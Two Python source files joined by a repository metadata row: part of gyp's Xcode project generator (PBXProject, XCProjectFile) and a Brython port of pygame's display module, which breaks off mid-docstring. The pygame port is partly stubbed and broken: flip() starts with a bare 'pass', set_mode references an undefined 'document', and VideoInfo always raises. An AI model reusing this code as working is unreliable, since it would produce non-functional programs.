sources_phase = PBXSourcesBuildPhase()
self.AppendProperty('buildPhases', sources_phase)
return sources_phase
def FrameworksPhase(self):
frameworks_phase = self.GetBuildPhaseByType(PBXFrameworksBuildPhase)
if frameworks_phase is None:
frameworks_phase = PBXFrameworksBuildPhase()
self.AppendProperty('buildPhases', frameworks_phase)
return frameworks_phase
def AddDependency(self, other):
# super
XCTarget.AddDependency(self, other)
static_library_type = 'com.apple.product-type.library.static'
shared_library_type = 'com.apple.product-type.library.dynamic'
framework_type = 'com.apple.product-type.framework'
if isinstance(other, PBXNativeTarget) and \
'productType' in self._properties and \
self._properties['productType'] != static_library_type and \
'productType' in other._properties and \
(other._properties['productType'] == static_library_type or \
((other._properties['productType'] == shared_library_type or \
other._properties['productType'] == framework_type) and \
((not other.HasBuildSetting('MACH_O_TYPE')) or
other.GetBuildSetting('MACH_O_TYPE') != 'mh_bundle'))):
file_ref = other.GetProperty('productReference')
pbxproject = self.PBXProjectAncestor()
other_pbxproject = other.PBXProjectAncestor()
if pbxproject != other_pbxproject:
other_project_product_group = \
pbxproject.AddOrGetProjectReference(other_pbxproject)[0]
file_ref = other_project_product_group.GetChildByRemoteObject(file_ref)
self.FrameworksPhase().AppendProperty('files',
PBXBuildFile({'fileRef': file_ref}))
class PBXAggregateTarget(XCTarget):
pass
class PBXProject(XCContainerPortal):
# A PBXProject is really just an XCObject, the XCContainerPortal thing is
# just to allow PBXProject to be used in the containerPortal property of
# PBXContainerItemProxy.
"""
Attributes:
path: "sample.xcodeproj". TODO(mark) Document me!
_other_pbxprojects: A dictionary, keyed by other PBXProject objects. Each
value is a reference to the dict in the
projectReferences list associated with the keyed
PBXProject.
"""
_schema = XCContainerPortal._schema.copy()
_schema.update({
'attributes': [0, dict, 0, 0],
'buildConfigurationList': [0, XCConfigurationList, 1, 1,
XCConfigurationList()],
'compatibilityVersion': [0, str, 0, 1, 'Xcode 3.2'],
'hasScannedForEncodings': [0, int, 0, 1, 1],
'mainGroup': [0, PBXGroup, 1, 1, PBXGroup()],
'projectDirPath': [0, str, 0, 1, ''],
'projectReferences': [1, dict, 0, 0],
'projectRoot': [0, str, 0, 1, ''],
'targets': [1, XCTarget, 1, 1, []],
})
def __init__(self, properties=None, id=None, parent=None, path=None):
self.path = path
self._other_pbxprojects = {}
# super
return XCContainerPortal.__init__(self, properties, id, parent)
def Name(self):
name = self.path
if name[-10:] == '.xcodeproj':
name = name[:-10]
return posixpath.basename(name)
def Path(self):
return self.path
def Comment(self):
return 'Project object'
def Children(self):
# super
children = XCContainerPortal.Children(self)
# Add children that the schema doesn't know about. Maybe there's a more
# elegant way around this, but this is the only case where we need to own
# objects in a dictionary (that is itself in a list), and three lines for
# a one-off isn't that big a deal.
if 'projectReferences' in self._properties:
for reference in self._properties['projectReferences']:
children.append(reference['ProductGroup'])
return children
def PBXProjectAncestor(self):
return self
def _GroupByName(self, name):
if not 'mainGroup' in self._properties:
self.SetProperty('mainGroup', PBXGroup())
main_group = self._properties['mainGroup']
group = main_group.GetChildByName(name)
if group is None:
group = PBXGroup({'name': name})
main_group.AppendChild(group)
return group
# SourceGroup and ProductsGroup are created by default in Xcode's own
# templates.
def SourceGroup(self):
return self._GroupByName('Source')
def ProductsGroup(self):
return self._GroupByName('Products')
# IntermediatesGroup is used to collect source-like files that are generated
# by rules or script phases and are placed in intermediate directories such
# as DerivedSources.
def IntermediatesGroup(self):
return self._GroupByName('Intermediates')
# FrameworksGroup and ProjectsGroup are top-level groups used to collect
# frameworks and projects.
def FrameworksGroup(self):
return self._GroupByName('Frameworks')
def ProjectsGroup(self):
return self._GroupByName('Projects')
def RootGroupForPath(self, path):
"""Returns a PBXGroup child of this object to which path should be added.
This method is intended to choose between SourceGroup and
IntermediatesGroup on the basis of whether path is present in a source
directory or an intermediates directory. For the purposes of this
determination, any path located within a derived file directory such as
PROJECT_DERIVED_FILE_DIR is treated as being in an intermediates
directory.
The returned value is a two-element tuple. The first element is the
PBXGroup, and the second element specifies whether that group should be
organized hierarchically (True) or as a single flat list (False).
"""
# TODO(mark): make this a class variable and bind to self on call?
# Also, this list is nowhere near exhaustive.
# INTERMEDIATE_DIR and SHARED_INTERMEDIATE_DIR are used by
# gyp.generator.xcode. There should probably be some way for that module
# to push the names in, rather than having to hard-code them here.
source_tree_groups = {
'DERIVED_FILE_DIR': (self.IntermediatesGroup, True),
'INTERMEDIATE_DIR': (self.IntermediatesGroup, True),
'PROJECT_DERIVED_FILE_DIR': (self.IntermediatesGroup, True),
'SHARED_INTERMEDIATE_DIR': (self.IntermediatesGroup, True),
}
(source_tree, path) = SourceTreeAndPathFromPath(path)
if source_tree != None and source_tree in source_tree_groups:
(group_func, hierarchical) = source_tree_groups[source_tree]
group = group_func()
return (group, hierarchical)
# TODO(mark): make additional choices based on file extension.
return (self.SourceGroup(), True)
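  # Illustrative sketch (editor's addition): routing paths to root groups.
  #
  #   project = PBXProject(path='sample.xcodeproj')
  #   project.RootGroupForPath('src/foo.cc')
  #   # -> (project.SourceGroup(), True)
  #   project.RootGroupForPath('$(INTERMEDIATE_DIR)/foo.gen.cc')
  #   # -> (project.IntermediatesGroup(), True)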
def AddOrGetFileInRootGroup(self, path):
"""Returns a PBXFileReference corresponding to path in the correct group
according to RootGroupForPath's heuristics.
If an existing PBXFileReference for path exists, it will be returned.
Otherwise, one will be created and returned.
"""
(group, hierarchical) = self.RootGroupForPath(path)
return group.AddOrGetFileByPath(path, hierarchical)
def RootGroupsTakeOverOnlyChildren(self, recurse=False):
"""Calls TakeOverOnlyChild for all groups in the main group."""
for group in self._properties['mainGroup']._properties['children']:
if isinstance(group, PBXGroup):
group.TakeOverOnlyChild(recurse)
def SortGroups(self):
# Sort the children of the mainGroup (like "Source" and "Products")
# according to their defined order.
self._properties['mainGroup']._properties['children'] = \
sorted(self._properties['mainGroup']._properties['children'],
cmp=lambda x,y: x.CompareRootGroup(y))
# Sort everything else by putting group before files, and going
# alphabetically by name within sections of groups and files. SortGroup
# is recursive.
for group in self._properties['mainGroup']._properties['children']:
if not isinstance(group, PBXGroup):
continue
if group.Name() == 'Products':
# The Products group is a special case. Instead of sorting
# alphabetically, sort things in the order of the targets that
# produce the products. To do this, just build up a new list of
# products based on the targets.
products = []
for target in self._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
product = target._properties['productReference']
# Make sure that the product is already in the products group.
assert product in group._properties['children']
products.append(product)
# Make sure that this process doesn't miss anything that was already
# in the products group.
assert len(products) == len(group._properties['children'])
group._properties['children'] = products
else:
group.SortGroup()
def AddOrGetProjectReference(self, other_pbxproject):
"""Add a reference to another project file (via PBXProject object) to this
one.
Returns [ProductGroup, ProjectRef]. ProductGroup is a PBXGroup object in
this project file that contains a PBXReferenceProxy object for each
product of each PBXNativeTarget in the other project file. ProjectRef is
a PBXFileReference to the other project file.
If this project file already references the other project file, the
existing ProductGroup and ProjectRef are returned. The ProductGroup will
still be updated if necessary.
"""
if not 'projectReferences' in self._properties:
self._properties['projectReferences'] = []
product_group = None
project_ref = None
if not other_pbxproject in self._other_pbxprojects:
# This project file isn't yet linked to the other one. Establish the
# link.
product_group = PBXGroup({'name': 'Products'})
# ProductGroup is strong.
product_group.parent = self
# There's nothing unique about this PBXGroup, and if left alone, it will
# wind up with the same set of hashables as all other PBXGroup objects
# owned by the projectReferences list. Add the hashables of the
# remote PBXProject that it's related to.
product_group._hashables.extend(other_pbxproject.Hashables())
# The other project reports its path as relative to the same directory
# that this project's path is relative to. The other project's path
# is not necessarily already relative to this project. Figure out the
# pathname that this project needs to use to refer to the other one.
this_path = posixpath.dirname(self.Path())
projectDirPath = self.GetProperty('projectDirPath')
if projectDirPath:
if posixpath.isabs(projectDirPath[0]):
this_path = projectDirPath
else:
this_path = posixpath.join(this_path, projectDirPath)
other_path = gyp.common.RelativePath(other_pbxproject.Path(), this_path)
# ProjectRef is weak (it's owned by the mainGroup hierarchy).
project_ref = PBXFileReference({
'lastKnownFileType': 'wrapper.pb-project',
'path': other_path,
'sourceTree': 'SOURCE_ROOT',
})
self.ProjectsGroup().AppendChild(project_ref)
ref_dict = {'ProductGroup': product_group, 'ProjectRef': project_ref}
self._other_pbxprojects[other_pbxproject] = ref_dict
self.AppendProperty('projectReferences', ref_dict)
# Xcode seems to sort this list case-insensitively
self._properties['projectReferences'] = \
sorted(self._properties['projectReferences'], cmp=lambda x,y:
cmp(x['ProjectRef'].Name().lower(),
y['ProjectRef'].Name().lower()))
else:
      # The link already exists. Pull out the relevant data.
project_ref_dict = self._other_pbxprojects[other_pbxproject]
product_group = project_ref_dict['ProductGroup']
project_ref = project_ref_dict['ProjectRef']
self._SetUpProductReferences(other_pbxproject, product_group, project_ref)
inherit_unique_symroot = self._AllSymrootsUnique(other_pbxproject, False)
targets = other_pbxproject.GetProperty('targets')
if all(self._AllSymrootsUnique(t, inherit_unique_symroot) for t in targets):
dir_path = project_ref._properties['path']
product_group._hashables.extend(dir_path)
return [product_group, project_ref]
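  # Illustrative sketch (editor's addition): referencing another project file.
  # Assuming this_project and other_project are PBXProject objects with paths
  # set:
  #
  #   product_group, project_ref = \
  #       this_project.AddOrGetProjectReference(other_project)
  #   # project_ref is a PBXFileReference to the other .xcodeproj, and
  #   # product_group holds a PBXReferenceProxy for each native target's
  #   # product; calling the method again returns the same pair.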
def _AllSymrootsUnique(self, target, inherit_unique_symroot):
# Returns True if all configurations have a unique 'SYMROOT' attribute.
    # The value of inherit_unique_symroot decides whether a configuration is
    # assumed to inherit a unique 'SYMROOT' attribute from its parent when it
    # doesn't define an explicit value for 'SYMROOT'.
symroots = self._DefinedSymroots(target)
for s in self._DefinedSymroots(target):
if (s is not None and not self._IsUniqueSymrootForTarget(s) or
s is None and not inherit_unique_symroot):
return False
return True if symroots else inherit_unique_symroot
def _DefinedSymroots(self, target):
# Returns all values for the 'SYMROOT' attribute defined in all
# configurations for this target. If any configuration doesn't define the
    # 'SYMROOT' attribute, None is added to the returned set. If no
    # configuration defines the 'SYMROOT' attribute, an empty set is
    # returned.
config_list = target.GetProperty('buildConfigurationList')
symroots = set()
for config in config_list.GetProperty('buildConfigurations'):
setting = config.GetProperty('buildSettings')
if 'SYMROOT' in setting:
symroots.add(setting['SYMROOT'])
else:
symroots.add(None)
if len(symroots) == 1 and None in symroots:
return set()
return symroots
def _IsUniqueSymrootForTarget(self, symroot):
    # Returns True if the given 'SYMROOT' value is unique for a target. A
    # value is considered unique if the Xcode macro '$SRCROOT' appears in it
    # in any form.
uniquifier = ['$SRCROOT', '$(SRCROOT)']
if any(x in symroot for x in uniquifier):
return True
return False
def _SetUpProductReferences(self, other_pbxproject, product_group,
project_ref):
# TODO(mark): This only adds references to products in other_pbxproject
# when they don't exist in this pbxproject. Perhaps it should also
# remove references from this pbxproject that are no longer present in
# other_pbxproject. Perhaps it should update various properties if they
# change.
for target in other_pbxproject._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
other_fileref = target._properties['productReference']
if product_group.GetChildByRemoteObject(other_fileref) is None:
# Xcode sets remoteInfo to the name of the target and not the name
# of its product, despite this proxy being a reference to the product.
container_item = PBXContainerItemProxy({
'containerPortal': project_ref,
'proxyType': 2,
'remoteGlobalIDString': other_fileref,
'remoteInfo': target.Name()
})
# TODO(mark): Does sourceTree get copied straight over from the other
# project? Can the other project ever have lastKnownFileType here
# instead of explicitFileType? (Use it if so?) Can path ever be
# unset? (I don't think so.) Can other_fileref have name set, and
# does it impact the PBXReferenceProxy if so? These are the questions
# that perhaps will be answered one day.
reference_proxy = PBXReferenceProxy({
'fileType': other_fileref._properties['explicitFileType'],
'path': other_fileref._properties['path'],
'sourceTree': other_fileref._properties['sourceTree'],
'remoteRef': container_item,
})
product_group.AppendChild(reference_proxy)
def SortRemoteProductReferences(self):
# For each remote project file, sort the associated ProductGroup in the
# same order that the targets are sorted in the remote project file. This
# is the sort order used by Xcode.
def CompareProducts(x, y, remote_products):
# x and y are PBXReferenceProxy objects. Go through their associated
# PBXContainerItem to get the remote PBXFileReference, which will be
# present in the remote_products list.
x_remote = x._properties['remoteRef']._properties['remoteGlobalIDString']
y_remote = y._properties['remoteRef']._properties['remoteGlobalIDString']
x_index = remote_products.index(x_remote)
y_index = remote_products.index(y_remote)
# Use the order of each remote PBXFileReference in remote_products to
# determine the sort order.
return cmp(x_index, y_index)
for other_pbxproject, ref_dict in self._other_pbxprojects.iteritems():
# Build up a list of products in the remote project file, ordered the
# same as the targets that produce them.
remote_products = []
for target in other_pbxproject._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
remote_products.append(target._properties['productReference'])
# Sort the PBXReferenceProxy children according to the list of remote
# products.
product_group = ref_dict['ProductGroup']
product_group._properties['children'] = sorted(
product_group._properties['children'],
cmp=lambda x, y, rp=remote_products: CompareProducts(x, y, rp))
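  # Editor's note (illustrative sketch, not part of the original file): under
  # Python 3 the cmp= argument to sorted() no longer exists, so the comparison
  # above would be expressed with a key function instead, along these lines:
  #
  #   def remote_index(proxy):
  #     remote = proxy._properties['remoteRef']._properties['remoteGlobalIDString']
  #     return remote_products.index(remote)
  #   product_group._properties['children'] = sorted(
  #       product_group._properties['children'], key=remote_index)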
class XCProjectFile(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'archiveVersion': [0, int, 0, 1, 1],
'classes': [0, dict, 0, 1, {}],
'objectVersion': [0, int, 0, 1, 46],
'rootObject': [0, PBXProject, 1, 1],
})
def ComputeIDs(self, recursive=True, overwrite=True, hash=None):
# Although XCProjectFile is implemented here as an XCObject, it's not a
# proper object in the Xcode sense, and it certainly doesn't have its own
# ID. Pass through an attempt to update IDs to the real root object.
if recursive:
self._properties['rootObject'].ComputeIDs(recursive, overwrite, hash)
def Print(self, file=sys.stdout):
self.VerifyHasRequiredProperties()
# Add the special "objects" property, which will be caught and handled
# separately during printing. This structure allows a fairly standard
    # loop to do the normal printing.
self._properties['objects'] = {}
self._XCPrint(file, 0, '// !$*UTF8*$!\n')
if self._should_print_single_line:
self._XCPrint(file, 0, '{ ')
else:
self._XCPrint(file, 0, '{\n')
for property, value in sorted(self._properties.iteritems(),
cmp=lambda x, y: cmp(x, y)):
if property == 'objects':
self._PrintObjects(file)
else:
self._XCKVPrint(file, 1, property, value)
self._XCPrint(file, 0, '}\n')
del self._properties['objects']
def _PrintObjects(self, file):
if self._should_print_single_line:
self._XCPrint(file, 0, 'objects = {')
else:
self._XCPrint(file, 1, 'objects = {\n')
objects_by_class = {}
for object in self.Descendants():
if object == self:
continue
class_name = object.__class__.__name__
if not class_name in objects_by_class:
objects_by_class[class_name] = []
objects_by_class[class_name].append(object)
for class_name in sorted(objects_by_class):
self._XCPrint(file, 0, '\n')
self._XCPrint(file, 0, '/* Begin ' + class_name + ' section */\n')
for object in sorted(objects_by_class[class_name],
cmp=lambda x, y: cmp(x.id, y.id)):
object.Print(file)
self._XCPrint(file, 0, '/* End ' + class_name + ' section */\n')
if self._should_print_single_line:
self._XCPrint(file, 0, '}; ')
else:
self._XCPrint(file, 1, '};\n')
| mit |
40223220/2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/site-packages/pygame/display.py | 603 | 25179 | #!/usr/bin/env python
'''Pygame module to control the display window and screen.
This module offers control over the pygame display. Pygame has a single display
Surface that is either contained in a window or runs full screen. Once you
create the display you treat it as a regular Surface. Changes are not
immediately visible onscreen, you must choose one of the two flipping functions
to update the actual display.
The pygame display can actually be initialized in one of several modes. By
default the display is a basic software driven framebuffer. You can request
special modules like hardware acceleration and OpenGL support. These are
controlled by flags passed to pygame.display.set_mode().
Pygame can only have a single display active at any time. Creating a new one
with pygame.display.set_mode() will close the previous display. If precise
control is needed over the pixel format or display resolutions, use the
functions pygame.display.mode_ok(), pygame.display.list_modes(), and
pygame.display.Info() to query information about the display.
Once the display Surface is created, the functions from this module
affect the single existing display. The Surface becomes invalid if the module
is uninitialized. If a new display mode is set, the existing Surface will
automatically switch to operate on the new display.
When the display mode is set, several events are placed on the pygame
event queue. pygame.QUIT is sent when the user has requested the program
to shutdown. The window will receive pygame.ACTIVEEVENT events as the
display gains and loses input focus. If the display is set with the
pygame.RESIZABLE flag, pygame.VIDEORESIZE events will be sent when the
user adjusts the window dimensions. Hardware displays that draw direct
to the screen will get pygame.VIDEOEXPOSE events when portions of the
window must be redrawn.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import sys
from SDL import *
import pygame.base
import pygame.pkgdata
import pygame.surface
#brython
import pygame.constants
from browser import window
#from javascript import console
_display_surface = None
_icon_was_set = 0
_icon_defaultname = 'pygame_icon.bmp'
_init_video=False
def __PYGAMEinit__():
pygame.base.register_quit(_display_autoquit)
def _display_autoquit():
global _display_surface
_display_surface = None
def init():
'''Initialize the display module.
Initializes the pygame display module. The display module cannot do
anything until it is initialized. This is usually handled for you
automatically when you call the higher level `pygame.init`.
Pygame will select from one of several internal display backends when it
is initialized. The display mode will be chosen depending on the platform
and permissions of current user. Before the display module is initialized
the environment variable SDL_VIDEODRIVER can be set to control which
backend is used. The systems with multiple choices are listed here.
Windows
windib, directx
Unix
x11, dga, fbcon, directfb, ggi, vgl, svgalib, aalib
On some platforms it is possible to embed the pygame display into an already
existing window. To do this, the environment variable SDL_WINDOWID must be
set to a string containing the window id or handle. The environment variable
is checked when the pygame display is initialized. Be aware that there can
be many strange side effects when running in an embedded display.
It is harmless to call this more than once, repeated calls have no effect.
'''
pygame.base._video_autoinit()
__PYGAMEinit__()
def quit():
'''Uninitialize the display module.
This will shut down the entire display module. This means any active
displays will be closed. This will also be handled automatically when the
program exits.
It is harmless to call this more than once, repeated calls have no effect.
'''
pygame.base._video_autoquit()
_display_autoquit()
def get_init():
'''Get status of display module initialization.
:rtype: bool
:return: True if SDL's video system is currently initialized.
'''
return SDL_WasInit(SDL_INIT_VIDEO) != 0
def set_mode(resolution, flags=0, depth=0):
'''Initialize a window or screen for display.
This function will create a display Surface. The arguments passed in are
requests for a display type. The actual created display will be the best
possible match supported by the system.
The `resolution` argument is a pair of numbers representing the width and
height. The `flags` argument is a collection of additional options.
The `depth` argument represents the number of bits to use for color.
The Surface that gets returned can be drawn to like a regular Surface but
changes will eventually be seen on the monitor.
It is usually best to not pass the depth argument. It will default to the
best and fastest color depth for the system. If your game requires a
specific color format you can control the depth with this argument. Pygame
will emulate an unavailable color depth which can be slow.
When requesting fullscreen display modes, sometimes an exact match for the
requested resolution cannot be made. In these situations pygame will select
    the closest compatible match. The returned surface will still always match
the requested resolution.
The flags argument controls which type of display you want. There are
several to choose from, and you can even combine multiple types using the
bitwise or operator, (the pipe "|" character). If you pass 0 or no flags
argument it will default to a software driven window. Here are the display
flags you will want to choose from:
pygame.FULLSCREEN
create a fullscreen display
pygame.DOUBLEBUF
recommended for HWSURFACE or OPENGL
pygame.HWSURFACE
        hardware accelerated, only in FULLSCREEN
pygame.OPENGL
create an opengl renderable display
pygame.RESIZABLE
display window should be sizeable
pygame.NOFRAME
display window will have no border or controls
:Parameters:
- `resolution`: int, int
- `flags`: int
- `depth`: int
:rtype: `Surface`
'''
global _display_surface
w, h = resolution
if w <= 0 or h <= 0:
raise pygame.base.error('Cannot set 0 sized display mode')
if not SDL_WasInit(SDL_INIT_VIDEO):
init()
if flags & SDL_OPENGL:
if flags & SDL_DOUBLEBUF:
flags &= ~SDL_DOUBLEBUF
SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 1)
else:
SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 0)
if depth:
SDL_GL_SetAttribute(SDL_GL_DEPTH_SIZE, depth)
surf = SDL_SetVideoMode(w, h, depth, flags)
if SDL_GL_GetAttribute(SDL_GL_DOUBLEBUFFER):
surf.flags |= SDL_DOUBLEBUF
else:
if not depth:
flags |= SDL_ANYFORMAT
surf = SDL_SetVideoMode(w, h, depth, flags)
title, icontitle = SDL_WM_GetCaption()
if not title:
SDL_WM_SetCaption('pygame window', 'pygame')
SDL_PumpEvents()
if _display_surface:
_display_surface._surf = surf
else:
#_display_surface = pygame.surface.Surface(surf=surf)
_display_surface = pygame.surface.Surface(dim=(w,h))
document['pydiv'] <= _display_surface.canvas
if sys.platform != 'darwin':
if not _icon_was_set:
try:
file = pygame.pkgdata.getResource(_icon_defaultname)
iconsurf = pygame.image.load(file)
SDL_SetColorKey(iconsurf._surf, SDL_SRCCOLORKEY, 0)
set_icon(iconsurf)
except IOError:
# Not worth dying over.
pass
return _display_surface
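# Editor's sketch (illustrative only, not part of the original module): a
# minimal, hypothetical use of set_mode(), combining display flags with the
# bitwise-or operator as described in the docstring above. The function is
# never called here.
def _example_set_mode_usage():
    import pygame
    pygame.init()
    screen = pygame.display.set_mode((640, 480), pygame.DOUBLEBUF | pygame.RESIZABLE)
    screen.fill((0, 0, 0))   # clear to black
    pygame.display.flip()    # make the change visible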
def get_surface():
'''Get current display surface.
Returns a `Surface` object representing the current display. Will
return None if called before the display mode is set.
:rtype: `Surface`
'''
return _display_surface
def flip():
'''Update the full display surface to the screen.
This will update the contents of the entire display. If your display mode
is using the flags pygame.HWSURFACE and pygame.DOUBLEBUF, this will wait
for a vertical retrace and swap the surfaces. If you are using a different
type of display mode, it will simply update the entire contents of the
surface.
When using an pygame.OPENGL display mode this will perform a gl buffer
swap.
'''
pass
_video_init_check()
screen = SDL_GetVideoSurface()
if not screen:
raise pygame.base.error('Display mode not set')
if screen.flags & SDL_OPENGL:
SDL_GL_SwapBuffers()
else:
SDL_Flip(screen)
def _crop_rect(w, h, rect):
if rect.x >= w or rect.y >= h or \
rect.x + rect.w <= 0 or rect.y + rect.h <= 0:
return None
rect.x = max(rect.x, 0)
rect.y = max(rect.y, 0)
rect.w = min(rect.x + rect.w, w) - rect.x
rect.h = min(rect.y + rect.h, h) - rect.y
return rect
def update(*rectangle):
'''Update portions of the screen for software displays.
This function is like an optimized version of pygame.display.flip() for
    software displays. It allows only a portion of the screen to be updated,
instead of the entire area. If no argument is passed it updates the entire
Surface area like `flip`.
You can pass the function a single rectangle, or a sequence of rectangles.
It is more efficient to pass many rectangles at once than to call update
multiple times with single or a partial list of rectangles. If passing
a sequence of rectangles it is safe to include None values in the list,
which will be skipped.
This call cannot be used on pygame.OPENGL displays and will generate an
exception.
:Parameters:
`rectangle` : Rect or sequence of Rect
Area(s) to update
'''
# Undocumented: also allows argument tuple to represent one rect;
# e.g. update(0, 0, 10, 10) or update((0, 0), (10, 10))
_video_init_check()
screen = SDL_GetVideoSurface()
if not screen:
raise pygame.base.error('Display mode not set')
if screen.flags & SDL_OPENGL:
raise pygame.base.error('Cannot update an OPENGL display')
if not rectangle:
SDL_UpdateRect(screen, 0, 0, 0, 0)
else:
w, h = screen.w, screen.h
w, h = screen.width, screen.height
try:
rect = pygame.rect._rect_from_object(rectangle)._r
rect = _crop_rect(w, h, rect)
if rect:
SDL_UpdateRect(screen, rect.x, rect.y, rect.w, rect.h)
except TypeError:
rectangle = rectangle[0]
rects = [_crop_rect(w, h, pygame.rect._rect_from_object(r)._r) \
for r in rectangle if r]
SDL_UpdateRects(screen, rects)
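# Editor's sketch (illustrative only, not part of the original module): typical
# ways to call update(), matching the docstring above. The rect values are
# arbitrary and the function is never called here.
def _example_update_usage():
    import pygame
    screen = pygame.display.set_mode((320, 240))
    pygame.display.update()                              # whole surface, like flip()
    pygame.display.update(pygame.Rect(0, 0, 64, 64))     # a single rectangle
    pygame.display.update([pygame.Rect(0, 0, 64, 64),    # several rectangles;
                           None,                         # None entries are skipped
                           pygame.Rect(100, 100, 32, 32)])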
def get_driver():
'''Get name of the pygame display backend.
Pygame chooses one of many available display backends when it is
initialized. This returns the internal name used for the display backend.
This can be used to provide limited information about what display
capabilities might be accelerated.
:rtype: str
'''
_video_init_check()
return SDL_VideoDriverName()
def Info():
'''Create a video display information object.
Creates a simple object containing several attributes to describe the
current graphics environment. If this is called before
`set_mode` some platforms can provide information about the default
display mode. This can also be called after setting the display mode to
verify specific display options were satisfied.
:see: `VideoInfo`
:rtype: `VideoInfo`
'''
_video_init_check()
return VideoInfo()
class VideoInfo:
'''Video display information.
:Ivariables:
`hw` : bool
True if the display is hardware accelerated.
`wm` : bool
True if windowed display modes can be used.
`video_mem` : int
            The amount of video memory on the display, in megabytes. 0 if
unknown.
`bitsize` : int
Number of bits used to store each pixel.
`bytesize` : int
Number of bytes used to store each pixel.
`masks` : (int, int, int, int)
RGBA component mask.
`shifts` : (int, int, int, int)
RGBA component shift amounts.
`losses` : (int, int, int, int)
Number of bits lost from a 32 bit depth for each RGBA component.
`blit_hw` : bool
True if hardware Surface blitting is accelerated
`blit_hw_CC` : bool
True if hardware Surface colorkey blitting is accelerated
`blit_hw_A` : bool
True if hardware Surface pixel alpha blitting is accelerated
`blit_sw` : bool
True if software Surface blitting is accelerated
`blit_sw_CC` : bool
True if software Surface colorkey blitting is accelerated
`blit_sw_A` : bool
            True if software Surface pixel alpha blitting is accelerated
'''
def __init__(self):
#brython
#info = SDL_GetVideoInfo()
info=None
if not info:
raise pygame.base.error('Could not retrieve video info')
self.hw = info.hw_available
self.wm = info.wm_available
self.blit_hw = info.blit_hw
self.blit_hw_CC = info.blit_hw_CC
self.blit_hw_A = info.blit_hw_A
self.blit_sw = info.blit_sw
self.blit_sw_CC = info.blit_sw_CC
self.blit_sw_A = info.blit_sw_A
self.blit_fill = info.blit_fill
self.video_mem = info.video_mem
self.bitsize = info.vfmt.BitsPerPixel
self.bytesize = info.vfmt.BytesPerPixel
self.masks = (info.vfmt.Rmask, info.vfmt.Gmask,
info.vfmt.Bmask, info.vfmt.Amask)
self.shifts = (info.vfmt.Rshift, info.vfmt.Gshift,
info.vfmt.Bshift, info.vfmt.Ashift)
self.losses = (info.vfmt.Rloss, info.vfmt.Gloss,
info.vfmt.Bloss, info.vfmt.Aloss)
def __str__(self):
return ('<VideoInfo(hw = %d, wm = %d,video_mem = %d\n' + \
' blit_hw = %d, blit_hw_CC = %d, blit_hw_A = %d,\n'
' blit_sw = %d, blit_sw_CC = %d, blit_sw_A = %d,\n'
' bitsize = %d, bytesize = %d,\n'
' masks = (%d, %d, %d, %d),\n'
' shifts = (%d, %d, %d, %d),\n'
' losses = (%d, %d, %d, %d)>\n') % \
(self.hw, self.wm, self.video_mem,
self.blit_hw, self.blit_hw_CC, self.blit_hw_A,
self.blit_sw, self.blit_sw_CC, self.blit_sw_A,
self.bitsize, self.bytesize,
self.masks[0], self.masks[1], self.masks[2], self.masks[3],
self.shifts[0], self.shifts[1], self.shifts[2], self.shifts[3],
self.losses[0], self.losses[1], self.losses[2], self.losses[3])
def __repr__(self):
return str(self)
def get_wm_info():
'''Get settings from the system window manager.
:note: Currently unimplemented, returns an empty dict.
:rtype: dict
'''
_video_init_check()
return {}
def list_modes(depth=0, flags=pygame.constants.FULLSCREEN):
'''Get list of available fullscreen modes.
This function returns a list of possible dimensions for a specified color
depth. The return value will be an empty list if no display modes are
available with the given arguments. A return value of -1 means that any
requested resolution should work (this is likely the case for windowed
modes). Mode sizes are sorted from biggest to smallest.
If depth is 0, SDL will choose the current/best color depth for the
display. The flags defaults to pygame.FULLSCREEN, but you may need to add
additional flags for specific fullscreen modes.
:rtype: list of (int, int), or -1
:return: list of (width, height) pairs, or -1 if any mode is suitable.
'''
_video_init_check()
#brython
#format = SDL_PixelFormat()
#format.BitsPerPixel = depth
#brython
#if not format.BitsPerPixel:
# format.BitsPerPixel = SDL_GetVideoInfo().vfmt.BitsPerPixel
    #brython
    #rects = SDL_ListModes(format, flags)
    # Editor's note: SDL_ListModes is unavailable in this Brython port and the
    # lookup above is stubbed out; report -1 ("any mode works") so the check
    # below doesn't fail on an undefined name.
    rects = -1
if rects == -1:
return -1
return [(r.w, r.h) for r in rects]
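# Editor's sketch (illustrative only): a common pattern for picking a
# fullscreen resolution with list_modes(), as described above. The fallback
# size is an arbitrary example and the function is never called here.
def _example_list_modes_usage():
    import pygame
    pygame.display.init()
    modes = pygame.display.list_modes()
    if modes == -1:          # any resolution should work
        size = (800, 600)
    elif modes:
        size = modes[0]      # modes are sorted from biggest to smallest
    else:
        raise SystemExit('no fullscreen modes available')
    pygame.display.set_mode(size, pygame.FULLSCREEN)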
def mode_ok(size, flags=0, depth=0):
'''Pick the best color depth for a display mode
This function uses the same arguments as pygame.display.set_mode(). It is
    used to determine if a requested display mode is available. It will return
0 if the display mode cannot be set. Otherwise it will return a pixel
depth that best matches the display asked for.
Usually the depth argument is not passed, but some platforms can support
multiple display depths. If passed it will hint to which depth is a better
match.
The most useful flags to pass will be pygame.HWSURFACE, pygame.DOUBLEBUF,
and maybe pygame.FULLSCREEN. The function will return 0 if these display
flags cannot be set.
:rtype: int
:return: depth, in bits per pixel, or 0 if the requested mode cannot be
set.
'''
_video_init_check()
if not depth:
depth = SDL_GetVideoInfo().vfmt.BitsPerPixel
return SDL_VideoModeOK(size[0], size[1], depth, flags)
def gl_set_attribute(flag, value):
'''Set special OpenGL attributes.
When calling `pygame.display.set_mode` with the OPENGL flag,
pygame automatically handles setting the OpenGL attributes like
color and doublebuffering. OpenGL offers several other attributes
you may want control over. Pass one of these attributes as the
flag, and its appropriate value.
This must be called before `pygame.display.set_mode`.
The OPENGL flags are: GL_ALPHA_SIZE, GL_DEPTH_SIZE, GL_STENCIL_SIZE,
GL_ACCUM_RED_SIZE, GL_ACCUM_GREEN_SIZE, GL_ACCUM_BLUE_SIZE,
GL_ACCUM_ALPHA_SIZE GL_MULTISAMPLEBUFFERS, GL_MULTISAMPLESAMPLES,
GL_STEREO.
:Parameters:
- `flag`: int
- `value`: int
'''
_video_init_check()
SDL_GL_SetAttribute(flag, value)
def gl_get_attribute(flag):
'''Get special OpenGL attributes.
After calling `pygame.display.set_mode` with the OPENGL flag
you will likely want to check the value of any special OpenGL
